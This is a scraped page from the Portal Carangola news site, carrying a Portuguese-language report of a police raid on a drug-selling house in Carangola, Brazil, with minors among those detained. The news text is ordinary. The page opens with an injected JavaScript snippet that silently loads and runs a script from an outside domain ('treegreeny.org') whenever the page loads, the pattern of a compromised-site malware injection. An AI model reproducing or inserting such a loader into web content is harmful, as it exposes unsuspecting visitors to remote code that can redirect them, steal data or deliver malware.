;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PM estoura “boca de fumo” e traz 2 adultos e 3 menores para a DP de Muriaé. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

PM estoura “boca de fumo” e traz 2 adultos e 3 menores para a DP de Muriaé.

Policiais militares apreenderam drogas e dinheiro em uma residência na cidade de Carangola, na noite desta quinta-feira (18). Cinco suspeitos foram detidos, incluindo dois adolescentes, e o caso veio parar no plantão da Delegacia Regional de Muriaé, no bairro Safira.

A ação se deu no bairro Varginha e o militar, cabo Machado, de Carangola, disse à reportagem da Rádio Muriaé que o local já havia sido citado em diversas denúncias como “boca de fumo”.

Segundo o boletim de ocorrência, nesta quinta (18), uma equipe deu uma batida no imóvel após flagrar um menor de 17 anos, vendendo uma bucha de maconha a um rapaz de 19, na porta da casa que pertence a um jovem de 18 anos.

Conforme o registro, em seguida militares fizeram a abordagem e entraram na residência, onde flagraram outros dois adolescentes, de 16 e 17 anos, jogando drogas por uma janela, sendo recolhido já do lado de fora, 32 pedras de crack, três buchas grandes de maconha e R$ 120,00 em dinheiro.

Celulares e material para embalo de entorpecentes também foram apreendidos, e ainda de acordo com a PM, o dono casa, que segundo cabo machado, é muito conhecido da polícia, com várias passagens, incluindo tráfico de drogas, chegou durante a ação e foi detido.

Já na delegacia, em Muriaé, o jovem de 18 anos, responsável pela casa onde se deu a ação da PM, teve a prisão ratificada. Os demais responderão em liberdade.

Fonte e fotos: Rádio Muriaé

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.